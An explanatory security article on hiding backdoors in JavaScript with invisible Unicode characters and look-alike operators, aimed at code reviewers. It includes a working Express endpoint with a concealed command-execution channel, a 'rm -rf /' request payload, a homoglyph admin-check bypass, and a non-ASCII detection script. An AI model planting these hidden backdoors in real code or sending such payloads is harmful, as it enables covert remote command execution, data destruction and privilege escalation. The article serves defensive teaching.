Backdoor in JavaScript Applications through Invisible Character Attacks and Homoglyph Attacks

Problem

A backdoor is a way to bypass normal authentication: a "secret entrance" that allows remote access to a software system. Backdoors try to evade common detection methods such as code review and logging. Imagine you are developing an API and quietly add an endpoint that nobody knows about except you, which lets you steal user information.

Because they are hidden and hard to detect, backdoors can cause serious damage to a system. Nobody can be sure whether a backdoor exists in their system, or whether it is stealing or modifying data. Creating an undetectable backdoor is not easy, but once one slips past review, the damage can be severe.

As a developer, you may intentionally or unintentionally create a backdoor in the application you are working on using the "extremely clever" techniques described below. If you are a code reviewer, you should know these techniques too, so that you can expose them.

Invisible Character Attacks

The character "ㅤ" (U+3164, that is 0x3164 in hexadecimal) is called HANGUL FILLER. It renders as blank space, which is why it is described as an "invisible" character. In reality, this character is classified as a letter, so it can be used as a variable name in JavaScript.

const ㅤ = "hello world";
console.log(ㅤ); // hello world

Taking advantage of this property, it can be cleverly used in cases like the following.

const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);

const app = express();

app.get("/network_health", async (req, res) => {
  const { timeout, ㅤ } = req.query;
  const checkCommands = [
    "ping -c 1 google.com",  
    "curl -s http://example.com/",ㅤ
  ];

  try {
    await Promise.all(
      checkCommands.map(
        (cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
      )
    );
    res.status(200);
    res.send("ok");
  } catch (e) {
    res.status(500);
    res.send("failed");
  }
});

app.listen(8080);

At first glance, this is an API with a single endpoint, /network_health. When called, it runs two commands, ping and curl. Take a moment to see if you can spot anything unusual in the code snippet above.

Look at line 8:

const { timeout, ㅤ } = req.query;

There seems to be something after the timeout variable. It is the HANGUL FILLER character: the attacker is declaring a variable whose name is that character, bound to the query parameter of the same name.

Now look at line 11. The line appears to end after the comma, but the comma is in fact followed by the HANGUL FILLER variable, which becomes a third element of the array. So if req.query contains a HANGUL FILLER parameter, its value is executed as a command.
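To make the trick visible, the following sketch rewrites the two suspicious lines with an ordinary name. `buildCheckCommands`, `HANGUL_FILLER`, and `hidden` are hypothetical names introduced here for illustration. Nothing is executed; the function only returns the command list that the handler would pass to exec.

```javascript
// U+3164 HANGUL FILLER, written as an escape so it is visible in this listing.
const HANGUL_FILLER = "\u3164";

// Hypothetical helper: mirrors how the handler builds its command list,
// but binds the invisible query parameter to a visible name (`hidden`).
function buildCheckCommands(query) {
  const { timeout, [HANGUL_FILLER]: hidden } = query;
  const checkCommands = [
    "ping -c 1 google.com",
    "curl -s http://example.com/",
    hidden, // the line that seems to end with a comma really ends with this element
  ];
  // Same effect as the handler's `cmd && exec(...)`: empty entries are skipped.
  return {
    timeout: +timeout || 5_000,
    commands: checkCommands.filter(Boolean),
  };
}

console.log(buildCheckCommands({}).commands.length); // 2
console.log(buildCheckCommands({ [HANGUL_FILLER]: "echo pwned" }).commands.length); // 3
```

With a normal request the array holds two commands, so the endpoint behaves as documented. Only a request that carries the invisible parameter adds a third, attacker-chosen command.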

A query to the endpoint with the backdoor might look like this:

GET - /network_health?%E3%85%A4=rm%20-rf%20%2F

In a more readable form, it is equivalent to:

GET - /network_health?ㅤ=rm -rf /

This means that the command rm -rf / is passed to exec, which attempts to delete everything on the server.
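The decoding step can be checked without starting a server. The sketch below uses the standard `URLSearchParams` class as a stand-in for the query parser. Express uses its own parser by default, so treat this as an illustration of percent-decoding rather than of Express internals. The query string is one whose key is the percent-encoded HANGUL FILLER and whose "=" separator is left unencoded.

```javascript
// Key: %E3%85%A4 is the UTF-8 encoding of U+3164. Value: "rm -rf /".
const rawQuery = "%E3%85%A4=rm%20-rf%20%2F";

// URLSearchParams splits on "=" first, then percent-decodes key and value.
const params = new URLSearchParams(rawQuery);
const [[key, value]] = [...params];

// Print the key as code points, because the key itself is invisible.
const keyCodePoints = [...key].map(
  (ch) => "U+" + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0")
);

console.log(keyCodePoints); // [ 'U+3164' ]
console.log(value);         // rm -rf /

// If the "=" itself is percent-encoded, it becomes part of the key instead,
// so no parameter named U+3164 exists.
const encodedEquals = new URLSearchParams("%E3%85%A4%3Drm%20-rf%20%2F");
console.log(encodedEquals.get("\u3164")); // null
```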

Homoglyph Attacks

Homoglyph attacks use Unicode characters that closely resemble other characters, such as operators. The result is code that looks like an ordinary logical operation but actually does something else.

const [ENV_PROD, ENV_DEV] = ["PRODUCTION", "DEVELOPMENT"];

const environment = "PRODUCTION";

function isUserAdmin(user) {
  if ((environmentǃ=ENV_PROD)) {
    return true;
  }

  return false;
}

The isUserAdmin function is meant to decide whether a user is an admin based on the variable environment. If environment is not "PRODUCTION", then everyone is assumed to be an admin.

The idea is there, but look at line 6.

if ((environmentǃ=ENV_PROD)) {

In reality, the character "ǃ" is not the "!" of the != operator. It is U+01C3 LATIN LETTER RETROFLEX CLICK, a Unicode letter that closely resembles the exclamation mark. The condition in this if statement is therefore not a comparison but an assignment to a variable named environmentǃ, that is, environmentǃ = ENV_PROD. The assigned value "PRODUCTION" is a non-empty string, so the condition is always true, and all users, regardless of the environment, are considered admins.
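The effect is easy to reproduce with a visible name. In the sketch below, `lookalike` is a hypothetical stand-in for the identifier that ends in the look-alike character, and the two characters are written as escapes or printed as code points so they can be told apart.

```javascript
const ENV_PROD = "PRODUCTION";
const environment = "PRODUCTION";

// Hypothetical stand-in for the identifier `environment` + U+01C3.
let lookalike;

function isUserAdmin(user) {
  // An assignment expression evaluates to the assigned value.
  // "PRODUCTION" is a non-empty string, so the condition is always truthy.
  if ((lookalike = ENV_PROD)) {
    return true;
  }
  return false;
}

console.log(environment != ENV_PROD); // false: the check a reviewer thinks they see
console.log(isUserAdmin({}));         // true: what the code actually does

// The two characters differ only in their code points.
console.log("\u01C3".codePointAt(0).toString(16)); // 1c3 (LATIN LETTER RETROFLEX CLICK)
console.log("!".codePointAt(0).toString(16));      // 21 (EXCLAMATION MARK)
```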

There are many other characters that resemble characters used in the code that can be used similarly to the above case. For example: "/", "−", "+", "⩵", "❨", "⫽", "꓿", "∗". Unicode calls these characters "confusables".

How to Prevent?

Using Unicode to create backdoors is not a new idea. However, these tricks are compact and easy to miss, which is why you need to know they exist and stay vigilant.

Keep these tricks in mind when reviewing code from unknown or untrusted contributors. This is particularly relevant for open-source projects, which often receive contributions from "completely unknown" developers.

If possible, restrict source code to the ASCII character set. Many development teams already use English as their primary development language, so this rule costs little. Set up tooling that warns about code breaking the rule to limit these types of attacks.
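As a rough idea of what such a warning tool could look like, here is a minimal sketch that reports every character outside printable ASCII in a source string. `findNonAscii` is a hypothetical helper written for this article, not part of any linter, and a real setup would need an allowlist for legitimate non-ASCII text in strings and comments.

```javascript
// Report every character outside printable ASCII (plus tab) in a source string.
function findNonAscii(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((lineText, lineIndex) => {
    let column = 1;
    // for...of iterates by code point, so surrogate pairs stay together.
    for (const ch of lineText) {
      const cp = ch.codePointAt(0);
      const printableAscii = cp === 0x09 || (cp >= 0x20 && cp <= 0x7e);
      if (!printableAscii) {
        findings.push({
          line: lineIndex + 1,
          column,
          codePoint: "U+" + cp.toString(16).toUpperCase().padStart(4, "0"),
        });
      }
      // Columns are counted in UTF-16 units, as most editors do.
      column += ch.length;
    }
  });
  return findings;
}

// The two suspicious lines from this article, with the characters escaped.
const sample = [
  "const { timeout, \u3164 } = req.query;",
  "if ((environment\u01C3=ENV_PROD)) {",
].join("\n");

console.log(findNonAscii(sample));
// [ { line: 1, column: 18, codePoint: 'U+3164' },
//   { line: 2, column: 17, codePoint: 'U+01C3' } ]
```

A check like this could run in CI or in a pre-commit hook over changed files and fail the build when it finds anything.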

VS Code added a feature in the 1.63 update that highlights invisible and confusable characters: https://code.visualstudio.com/updates/v1_63#_unicode-highlighting.

The Unicode Consortium is also forming a task force to investigate source code spoofing issues: http://blog.unicode.org/2022/03/avoiding-source-code-spoofing.html.
